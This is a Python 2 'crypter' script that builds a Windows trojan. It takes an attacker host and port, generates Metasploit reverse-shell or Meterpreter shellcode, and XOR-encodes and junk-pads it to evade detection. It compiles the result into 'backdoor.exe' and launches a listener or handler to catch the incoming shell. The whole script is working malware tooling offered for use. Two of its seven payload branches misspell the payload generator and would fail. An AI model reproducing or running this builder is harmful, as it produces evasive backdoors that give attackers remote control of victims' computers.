crypter

1. #!/usr/bin/python
2. #=====================================
3. #
4. #   This Script requires
5. #   http://pastebin.com/yfbYZRwc
6. #
7. #=====================================
8. #coding: utf-8
9. from struct import *
10. import os
11. import commands
12. import subprocess
13. import random
14. os.system("clear")
15. print "*********************************************"
16. print "      : Crypter for metasploit :"
17. print "   Edited by: Sh3LlDu5t and Cyb4FrE3z"
18. print "*********************************************"
19. print ""
20. host = raw_input("lhost (e for external ip) ?").strip()
21. if host == 'e':
22.     os.system("curl checkip.dyndns.org >> ip.txt")
23.     lhost = commands.getoutput('cat ip.txt')
24.     os.system("rm ip.txt")
25.     os.system("clear")
26.     print "[*] lhost: ", lhost
27. else:
28.     lhost = host
29.     print "[*] lhost: ", lhost
30. lport = raw_input("lport ?").strip()
31. print "[*] lport: ", lport
32. print "**************************************"
33. print "1) windows/shell_reverse_tcp"
34. print "2) windows/shell/reverse_tcp"
35. print "3) windows/shell/reverse_tcp_dns"
36. print "4) windows/shell/reverse_http"
37. print "5) windows/meterpreter/reverse_tcp"
38. print "6) windows/meterpreter/reverse_tcp_dns"
39. print "7) windows/meterpreter/reverse_http"
40. print "**************************************"
41. payload = raw_input("Select a payload (1-7):").strip()
42. payload_raw = "temp.raw"
43. out = "temp.c"
44. structure = "structure.c"
45. key = random.randint(0,255)
46. print "[*] Generating random junk..."
47. print "[*] Randomizing file size..."
48. randomSize = random.randint(20480,25600)
49.  
50. junkA = ""
51. junkB = ""
52.  
53. junkA += "\""
54. for i in xrange(1,randomSize):
55.     junkA += chr(random.randint(65,90))
56. junkA +=  "\""
57.  
58. junkB += "\""
59. for i in xrange(0,randomSize):
60.     junkB += chr(random.randint(65,90))
61. junkB +=  "\""
62.  
63.  
64.  
65. print "[*] Generating metasploit shellcode..."
66. if payload == "1":
67.     os.system("msfvemon -p windows/shell_reverse_tcp LHOST=%s LPORT=%s -e x86/shikata_ga_nai -i 8 -f raw -o %s " % (lhost,lport,payload_raw))
68.  
69. elif payload == "2":
70.     os.system("msfvemon -p windows/shell/reverse_tcp LHOST=%s LPORT=%s -e x86/shikata_ga_nai -i 8 -f raw -o %s" % (lhost,lport,payload_raw))
71.  
72. elif payload == "3":
73.     os.system("msfvenom -p windows/shell/reverse_tcp_dns LHOST=%s LPORT=%s -e x86/shikata_ga_nai -i 8 -f raw -o %s" % (lhost,lport,payload_raw))
74.  
75. elif payload == "4":
76.     os.system("msfvenom -p windows/shell/reverse_http LHOST=%s LPORT=%s -e x86/shikata_ga_nai -i 8 -f raw -o %s" % (lhost,lport,payload_raw))
77.  
78. elif payload == "5":
79.     os.system("msfvenom -p windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s -e x86/shikata_ga_nai -i 8 -f raw -o %s" % (lhost,lport,payload_raw))
80.  
81. elif payload == "6":
82.     os.system("msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST=%s LPORT=%s -e x86/shikata_ga_nai -i 8 -f raw -o %s" % (lhost,lport,payload_raw))
83.  
84. elif payload == "7":
85.     os.system("msfvenom -p windows/meterpreter/reverse_http LHOST=%s LPORT=%s -e x86/shikata_ga_nai -i 8 -f raw -o %s" % (lhost,lport,payload_raw))
86.  
87.  
88. a = open(payload_raw,"rb")
89. b = open(out,"w")
90.  
91. payload_raw = a.read()
92. tempArray = []
93. outArray = []
94. x = 0
95.  
96. print "[*] Encoding with XOR key: ", hex(key)
97. print "[*] Obfuscating shellcode..."
98. length = int(len(payload_raw)*2)
99.  
100. for i in xrange(0,length):
101.     if i % 2 == 0:
102.         tempArray.append(unpack("B",payload_raw[x])[0]^key)
103.         x += 1
104.     else:
105.         randomByte = random.randint(65,90)
106.         tempArray.append(randomByte)   
107. for i in range(0,len(tempArray)):
108.     tempArray[i]="\\x%x"%tempArray[i]
109. for i in range(0,len(tempArray),15):
110.     outArray.append('\n"'+"".join(tempArray[i:i+15])+"\"")
111. outArray = "".join(outArray)
112.  
113. devide = "i % 2;"
114.  
115. open_structure = open(structure).read()
116. code = open_structure % (junkA,outArray,junkB,key,length,devide)
117. b.write(code)
118. b.flush()
119.  
120. print "[*] Compiling trojan horse..."
121. os.system("i586-mingw32msvc-gcc -mwindows temp.c")
122. print "[*] Stripping out the debugging symbols..."
123. os.system("strip --strip-debug a.exe")
124. print "[*] Finishing..."
125. os.system("mv a.exe backdoor.exe")
126.  
127. if payload == "1":
128.     print "[*] Starting the netcat listener..."
129.     os.system("nc -lvp %s" % (lport))
130. elif payload == "2":
131.     PAYLOAD = "windows/shell/reverse_tcp"
132. elif payload == "3":
133.     PAYLOAD = "windows/shell/reverse_tcp_dns"
134. elif payload == "4":
135.     PAYLOAD = "windows/shell/reverse_http"
136. elif payload == "5":
137.     PAYLOAD = "windows/meterpreter/reverse_tcp"
138. elif payload == "6":
139.     PAYLOAD = "windows/meterpreter/reverse_tcp_dns"
140. elif payload == "7":
141.     PAYLOAD = "windows/meterpreter/reverse_http"
142.  
143. print "[*] Cleaning up..."
144. os.system("rm temp.c")
145. os.system("rm temp.raw")
146.  
147. # write out rc file
148. filewrite = file("handler.rc", "w")
149. filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\n" % (PAYLOAD,lhost,lport))
150. filewrite.close()
151.  
152. #starting handler
153. ans = raw_input("Do you want to start a handler now? (y/n)").strip()
154. if ans == "y":
155.     print "[*] Starting metasploit handler..."
156.     os.system("msfconsole -r handler.rc")
157. elif ans == "n":
158.     print "[*] Run msfconsole -r handler.rc to start handler"
159.  
160. print "[*] Done !"